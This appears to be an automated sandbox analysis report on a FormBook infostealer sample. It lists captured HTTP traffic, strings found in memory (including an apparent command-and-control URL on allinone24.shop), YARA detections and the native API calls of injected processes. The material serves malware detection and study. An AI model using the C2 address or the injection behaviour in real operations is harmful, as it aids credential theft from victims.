Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 06 Jun 2024 11:28:50 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 06 Jun 2024 11:28:53 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 06 Jun 2024 11:28:55 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 06 Jun 2024 11:29:15 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Source: Amcache.hve.9.dr	String found in binary or memory: http://upx.sf.net
Source: FCJpElfgCpDtTJPmdGdlIYAgNj.exe, 00000011.00000002.4132492127.00000000052F9000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.allinone24.shop
Source: FCJpElfgCpDtTJPmdGdlIYAgNj.exe, 00000011.00000002.4132492127.00000000052F9000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.allinone24.shop/mcz6/
Source: chkdsk.exe, 0000000C.00000003.2020661533.0000000004DB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: chkdsk.exe, 0000000C.00000003.2020661533.0000000004DB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: chkdsk.exe, 0000000C.00000003.2020661533.0000000004DB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: chkdsk.exe, 0000000C.00000003.2020661533.0000000004DB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: chkdsk.exe, 0000000C.00000002.4131433850.0000000006864000.00000004.10000000.00040000.00000000.sdmp, FCJpElfgCpDtTJPmdGdlIYAgNj.exe, 00000011.00000002.4130813346.0000000003EE4000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://contacts.zoho.com/static/file?t=org&ID=456089&fs=thumb
Source: chkdsk.exe, 0000000C.00000003.2020661533.0000000004DB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: chkdsk.exe, 0000000C.00000003.2020661533.0000000004DB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: chkdsk.exe, 0000000C.00000003.2020661533.0000000004DB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: chkdsk.exe, 0000000C.00000002.4129628243.0000000004CE2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: chkdsk.exe, 0000000C.00000002.4129628243.0000000004D13000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: chkdsk.exe, 0000000C.00000002.4129628243.0000000004CE2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: chkdsk.exe, 0000000C.00000002.4129628243.0000000004CE2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033(
Source: chkdsk.exe, 0000000C.00000002.4129628243.0000000004CE2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: chkdsk.exe, 0000000C.00000003.2015595883.0000000009BB1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: chkdsk.exe, 0000000C.00000002.4131433850.0000000005EF8000.00000004.10000000.00040000.00000000.sdmp, FCJpElfgCpDtTJPmdGdlIYAgNj.exe, 00000011.00000002.4130813346.0000000003578000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.allinone24.shop/mcz6/?l65lvjLx=iV05GdjlKKe2Focp0rDI6BJmO0Ht/xDmYroAP0qP29Gns/tznWejtp74G
Source: chkdsk.exe, 0000000C.00000003.2020661533.0000000004DB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: chkdsk.exe, 0000000C.00000002.4131433850.0000000006B88000.00000004.10000000.00040000.00000000.sdmp, FCJpElfgCpDtTJPmdGdlIYAgNj.exe, 00000011.00000002.4130813346.0000000004208000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.fastmail.help/hc/en-us/articles/1500000280141
Source: chkdsk.exe, 0000000C.00000002.4131433850.0000000006B88000.00000004.10000000.00040000.00000000.sdmp, FCJpElfgCpDtTJPmdGdlIYAgNj.exe, 00000011.00000002.4130813346.0000000004208000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.fastmailusercontent.com/filestorage/css/main.css
Source: chkdsk.exe, 0000000C.00000002.4133130062.0000000008190000.00000004.00000800.00020000.00000000.sdmp, chkdsk.exe, 0000000C.00000002.4131433850.000000000703E000.00000004.10000000.00040000.00000000.sdmp, FCJpElfgCpDtTJPmdGdlIYAgNj.exe, 00000011.00000002.4130813346.00000000046BE000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: chkdsk.exe, 0000000C.00000003.2020661533.0000000004DB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: FCJpElfgCpDtTJPmdGdlIYAgNj.exe, 00000011.00000002.4130813346.000000000389C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.strato.de
Source: chkdsk.exe, 0000000C.00000002.4131433850.0000000006864000.00000004.10000000.00040000.00000000.sdmp, FCJpElfgCpDtTJPmdGdlIYAgNj.exe, 00000011.00000002.4130813346.0000000003EE4000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.zoho.com/sites/?src=parkeddomain&dr=www.jrksa.info
Source: chkdsk.exe, 0000000C.00000002.4131433850.0000000006864000.00000004.10000000.00040000.00000000.sdmp, FCJpElfgCpDtTJPmdGdlIYAgNj.exe, 00000011.00000002.4130813346.0000000003EE4000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.zoho.com/sites/images/professionally-crafted-themes.png
Source: chkdsk.exe, 0000000C.00000002.4131433850.0000000005BD4000.00000004.10000000.00040000.00000000.sdmp, FCJpElfgCpDtTJPmdGdlIYAgNj.exe, 00000011.00000002.4130813346.0000000003254000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.2126608628.000000001F514000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://yundun.console.aliyun.com/?p=waf#/waf/cn/dashboard/index

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 5.2.aspnet_wp.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.aspnet_wp.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.4130637411.0000000004DC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.4128948206.0000000000800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.4130704581.0000000004E00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.4132492127.00000000052A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1835227889.0000000005000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1834831653.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1836465483.00000000081C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.4130273413.0000000005600000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 5.2.aspnet_wp.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 5.2.aspnet_wp.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000C.00000002.4130637411.0000000004DC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000C.00000002.4128948206.0000000000800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000C.00000002.4130704581.0000000004E00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000011.00000002.4132492127.00000000052A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.1835227889.0000000005000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.1834831653.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.1836465483.00000000081C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000A.00000002.4130273413.0000000005600000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Uses regedit.exe to modify the Windows registry

Source: C:\Users\user\Desktop\eNXDCIvEXI.exe

Process created: C:\Windows\regedit.exe "C:\Windows\regedit.exe"

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0042B113 NtClose,	5_2_0042B113
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_055135C0 NtCreateMutant,LdrInitializeThunk,	5_2_055135C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_05512DF0 NtQuerySystemInformation,LdrInitializeThunk,	5_2_05512DF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_05512C70 NtFreeVirtualMemory,LdrInitializeThunk,	5_2_05512C70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_05512B60 NtClose,LdrInitializeThunk,	5_2_05512B60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_05514650 NtSuspendThread,	5_2_05514650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_05513010 NtOpenDirectoryObject,	5_2_05513010
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_05513090 NtSetValueKey,	5_2_05513090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_05514340 NtSetContextThread,	5_2_05514340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_05513D70 NtOpenThread,	5_2_05513D70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_05512D10 NtMapViewOfSection,	5_2_05512D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_05513D10 NtOpenProcessToken,	5_2_05513D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_05512D00 NtSetInformationFile,	5_2_05512D00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_05512D30 NtUnmapViewOfSection,	5_2_05512D30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_05512DD0 NtDelayExecution,	5_2_05512DD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_05512DB0 NtEnumerateKey,	5_2_05512DB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_05512C60 NtCreateKey,	5_2_05512C60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_05512C00 NtQueryInformationProcess,	5_2_05512C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_05512CC0 NtQueryVirtualMemory,	5_2_05512CC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_05512CF0 NtOpenProcess,	5_2_05512CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_05512CA0 NtQueryInformationToken,	5_2_05512CA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_05512F60 NtCreateProcessEx,	5_2_05512F60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_05512F30 NtCreateSection,	5_2_05512F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_05512FE0 NtCreateFile,	5_2_05512FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_05512F90 NtProtectVirtualMemory,	5_2_05512F90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_05512FB0 NtResumeThread,	5_2_05512FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_05512FA0 NtQuerySection,	5_2_05512FA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_05512E30 NtWriteVirtualMemory,	5_2_05512E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_05512EE0 NtQueueApcThread,	5_2_05512EE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_05512E80 NtReadVirtualMemory,	5_2_05512E80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_05512EA0 NtAdjustPrivilegesToken,	5_2_05512EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_055139B0 NtGetContextThread,	5_2_055139B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_05512BF0 NtAllocateVirtualMemory,	5_2_05512BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_05512BE0 NtQueryValueKey,	5_2_05512BE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_05512B80 NtQueryInformationFile,	5_2_05512B80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_05512BA0 NtEnumerateValueKey,	5_2_05512BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_05512AD0 NtReadFile,	5_2_05512AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_05512AF0 NtWriteFile,	5_2_05512AF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_05512AB0 NtWaitForSingleObject,	5_2_05512AB0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_052335C0 NtCreateMutant,LdrInitializeThunk,	12_2_052335C0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_05234650 NtSuspendThread,LdrInitializeThunk,	12_2_05234650
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_05234340 NtSetContextThread,LdrInitializeThunk,	12_2_05234340
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_05232D30 NtUnmapViewOfSection,LdrInitializeThunk,	12_2_05232D30
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_05232D10 NtMapViewOfSection,LdrInitializeThunk,	12_2_05232D10
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_05232DF0 NtQuerySystemInformation,LdrInitializeThunk,	12_2_05232DF0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_05232DD0 NtDelayExecution,LdrInitializeThunk,	12_2_05232DD0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_05232C60 NtCreateKey,LdrInitializeThunk,	12_2_05232C60
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_05232C70 NtFreeVirtualMemory,LdrInitializeThunk,	12_2_05232C70
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_05232CA0 NtQueryInformationToken,LdrInitializeThunk,	12_2_05232CA0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_05232F30 NtCreateSection,LdrInitializeThunk,	12_2_05232F30
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_05232FB0 NtResumeThread,LdrInitializeThunk,	12_2_05232FB0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_05232FE0 NtCreateFile,LdrInitializeThunk,	12_2_05232FE0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_05232E80 NtReadVirtualMemory,LdrInitializeThunk,	12_2_05232E80
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_05232EE0 NtQueueApcThread,LdrInitializeThunk,	12_2_05232EE0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_052339B0 NtGetContextThread,LdrInitializeThunk,	12_2_052339B0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_05232B60 NtClose,LdrInitializeThunk,	12_2_05232B60
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_05232BA0 NtEnumerateValueKey,LdrInitializeThunk,	12_2_05232BA0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_05232BE0 NtQueryValueKey,LdrInitializeThunk,	12_2_05232BE0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_05232BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	12_2_05232BF0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_05232AF0 NtWriteFile,LdrInitializeThunk,	12_2_05232AF0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_05232AD0 NtReadFile,LdrInitializeThunk,	12_2_05232AD0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_05233010 NtOpenDirectoryObject,	12_2_05233010
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_05233090 NtSetValueKey,	12_2_05233090
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_05232D00 NtSetInformationFile,	12_2_05232D00
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_05233D10 NtOpenProcessToken,	12_2_05233D10
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_05233D70 NtOpenThread,	12_2_05233D70
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_05232DB0 NtEnumerateKey,	12_2_05232DB0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_05232C00 NtQueryInformationProcess,	12_2_05232C00
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_05232CF0 NtOpenProcess,	12_2_05232CF0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_05232CC0 NtQueryVirtualMemory,	12_2_05232CC0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_05232F60 NtCreateProcessEx,	12_2_05232F60
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_05232FA0 NtQuerySection,	12_2_05232FA0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_05232F90 NtProtectVirtualMemory,	12_2_05232F90
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_05232E30 NtWriteVirtualMemory,	12_2_05232E30
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_05232EA0 NtAdjustPrivilegesToken,	12_2_05232EA0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_05232B80 NtQueryInformationFile,	12_2_05232B80
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_05232AB0 NtWaitForSingleObject,	12_2_05232AB0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_00827450 NtCreateFile,	12_2_00827450
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_008275B0 NtReadFile,	12_2_008275B0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_00827690 NtDeleteFile,	12_2_00827690
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_00827720 NtClose,	12_2_00827720
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_00827880 NtAllocateVirtualMemory,	12_2_00827880

Source: C:\Users\user\Desktop\eNXDCIvEXI.exe	Code function: 0_2_00007FFD9B8C6358	0_2_00007FFD9B8C6358
Source: C:\Users\user\Desktop\eNXDCIvEXI.exe	Code function: 0_2_00007FFD9B8920BD	0_2_00007FFD9B8920BD
Source: C:\Users\user\Desktop\eNXDCIvEXI.exe	Code function: 0_2_00007FFD9B89A050	0_2_00007FFD9B89A050
Source: C:\Users\user\Desktop\eNXDCIvEXI.exe	Code function: 0_2_00007FFD9B8C1678	0_2_00007FFD9B8C1678
